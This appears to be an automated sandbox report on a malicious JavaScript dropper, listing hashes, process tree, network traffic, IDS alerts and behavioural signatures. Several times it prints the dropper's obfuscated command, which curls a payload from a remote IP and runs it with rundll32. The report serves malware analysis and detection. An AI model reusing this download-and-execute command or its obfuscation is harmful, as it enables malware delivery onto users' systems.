Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Oct. 26, 2023, 10:30 a.m.	Oct. 26, 2023, 10:32 a.m.

Size	324.5KB
Type	ASCII text, with very long lines, with CRLF line terminators
MD5	`c3cc912df10bafc0de538be5557710ac`
SHA256	`d9d476bb05bec88f0ca70145821f41d139d9b401b915dc757021144cedc9bccd`
CRC32	`17A00D94`
ssdeep	`6144:G9CBblbPUmwEwvP6IoPalJvwXoJwnk0TnPAGS:G9CBZbPUV1YkmAGS`
Yara	None matched

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\Main332.js
2580
- cmd.exe "C:\Windows\System32\cmd.exe" /c Yjkc || EcHO Yjkc & piNg Yjkc || cuRl http://49.13.119.73/GJDtkud/Aerot -o %tMP%\Yjkc.dlld & piNg -n 4 Yjkc || rUNdlL32 %TmP%\Yjkc.dlld, Crash & Exit bOBWBPjSmAY
  2728
  - PING.EXE piNg Yjkc
    2828
  - curl.exe cuRl http://49.13.119.73/GJDtkud/Aerot -o C:\Users\test22\AppData\Local\Temp\Yjkc.dlld
    2888
  - PING.EXE piNg -n 4 Yjkc
    2940
  - rundll32.exe rUNdlL32 C:\Users\test22\AppData\Local\Temp\Yjkc.dlld, Crash
    3012

Name	Response	Post-Analysis Lookup
www.ssl.com	A 54.87.241.101 A 34.195.117.81	54.87.241.101

IP Address	Status	Action
164.124.101.2	Active	Moloch
34.195.117.81	Active	Moloch
49.13.119.73	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49167 -> 49.13.119.73:80	2013028	ET POLICY curl User-Agent Outbound	Attempted Information Leak
TCP 192.168.56.101:49167 -> 49.13.119.73:80	2034567	ET HUNTING curl User-Agent to Dotted Quad	Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Command line console output was observed (4 events)

Time & API	Arguments	Status	Return
WriteConsoleW Oct. 26, 2023, 10:30 a.m.	buffer: 'Yjkc' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW Oct. 26, 2023, 10:30 a.m.	buffer: Yjkc console_handle: 0x00000007	1	1
WriteConsoleA Oct. 26, 2023, 10:30 a.m.	buffer: Ping request could not find host Yjkc. Please check the name and try again. console_handle: 0x00000007	1	1
WriteConsoleA Oct. 26, 2023, 10:30 a.m.	buffer: Ping request could not find host Yjkc. Please check the name and try again. console_handle: 0x00000007	1	1

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

Connection to IP address

suspicious_request

GET http://49.13.119.73/GJDtkud/Aerot

Performs some HTTP requests (2 events)

request	GET http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt
request	GET http://49.13.119.73/GJDtkud/Aerot

Creates a suspicious process (2 events)

cmdline	"C:\Windows\System32\cmd.exe" /c Yjkc \|\| EcHO Yjkc & piNg Yjkc \|\| cuRl http://49.13.119.73/GJDtkud/Aerot -o %tMP%\Yjkc.dlld & piNg -n 4 Yjkc \|\| rUNdlL32 %TmP%\Yjkc.dlld, Crash & Exit bOBWBPjSmAY
cmdline	cmd.exe /c Yjkc \|\| EcHO Yjkc & piNg Yjkc \|\| cuRl http://49.13.119.73/GJDtkud/Aerot -o %tMP%\Yjkc.dlld & piNg -n 4 Yjkc \|\| rUNdlL32 %TmP%\Yjkc.dlld, Crash & Exit bOBWBPjSmAY

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW Oct. 26, 2023, 10:30 a.m.	show_type: 0 filepath_r: cmd.exe parameters: /c Yjkc \|\| EcHO Yjkc & piNg Yjkc \|\| cuRl http://49.13.119.73/GJDtkud/Aerot -o %tMP%\Yjkc.dlld & piNg -n 4 Yjkc \|\| rUNdlL32 %TmP%\Yjkc.dlld, Crash & Exit bOBWBPjSmAY filepath: cmd.exe	1	1	0

File has been identified by 2 AntiVirus engines on VirusTotal as malicious (2 events)

Kaspersky	HEUR:Trojan.Script.Generic
Microsoft	Trojan:Script/Wacatac.B!ml

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Oct. 26, 2023, 10:30 a.m.	flags: 15 family: 0		111	0

Yara rule detected in process memory (9 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Uses Windows utilities for basic Windows functionality (4 events)

cmdline	"C:\Windows\System32\cmd.exe" /c Yjkc \|\| EcHO Yjkc & piNg Yjkc \|\| cuRl http://49.13.119.73/GJDtkud/Aerot -o %tMP%\Yjkc.dlld & piNg -n 4 Yjkc \|\| rUNdlL32 %TmP%\Yjkc.dlld, Crash & Exit bOBWBPjSmAY
cmdline	cmd.exe /c Yjkc \|\| EcHO Yjkc & piNg Yjkc \|\| cuRl http://49.13.119.73/GJDtkud/Aerot -o %tMP%\Yjkc.dlld & piNg -n 4 Yjkc \|\| rUNdlL32 %TmP%\Yjkc.dlld, Crash & Exit bOBWBPjSmAY
cmdline	piNg -n 4 Yjkc
cmdline	piNg Yjkc

Communicates with host for which no DNS query was performed (1 event)

host

49.13.119.73

Wscript.exe initiated network communications indicative of a script based payload download (1 event)

Time & API	Arguments	Status	Return	Repeated
WSASend Oct. 26, 2023, 10:30 a.m.	buffer: GET /repository/SSLcomRootCertificationAuthorityRSA.crt HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Microsoft-CryptoAPI/6.1 Host: www.ssl.com socket: 964		0	0

Network communications indicative of a potential document or script payload download was initiated by the process wscript.exe (1 event)

Time & API	Arguments	Status	Return	Repeated
WSASend Oct. 26, 2023, 10:30 a.m.	buffer: GET /repository/SSLcomRootCertificationAuthorityRSA.crt HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Microsoft-CryptoAPI/6.1 Host: www.ssl.com socket: 964		0	0

One or more non-whitelisted processes were created (2 events)

parent_process	wscript.exe				martian_process	"C:\Windows\System32\cmd.exe" /c Yjkc \|\| EcHO Yjkc & piNg Yjkc \|\| cuRl http://49.13.119.73/GJDtkud/Aerot -o %tMP%\Yjkc.dlld & piNg -n 4 Yjkc \|\| rUNdlL32 %TmP%\Yjkc.dlld, Crash & Exit bOBWBPjSmAY
parent_process	wscript.exe				martian_process	cmd.exe /c Yjkc \|\| EcHO Yjkc & piNg Yjkc \|\| cuRl http://49.13.119.73/GJDtkud/Aerot -o %tMP%\Yjkc.dlld & piNg -n 4 Yjkc \|\| rUNdlL32 %TmP%\Yjkc.dlld, Crash & Exit bOBWBPjSmAY

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2580 resumed a thread in remote process 2728
NtResumeThread Oct. 26, 2023, 10:30 a.m.	thread_handle: 0x000004e0 suspend_count: 1 process_identifier: 2728	1	0	0

The process wscript.exe wrote an executable file to disk which it then attempted to execute (1 event)

file	C:\Windows\System32\cmd.exe

Main332.js

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All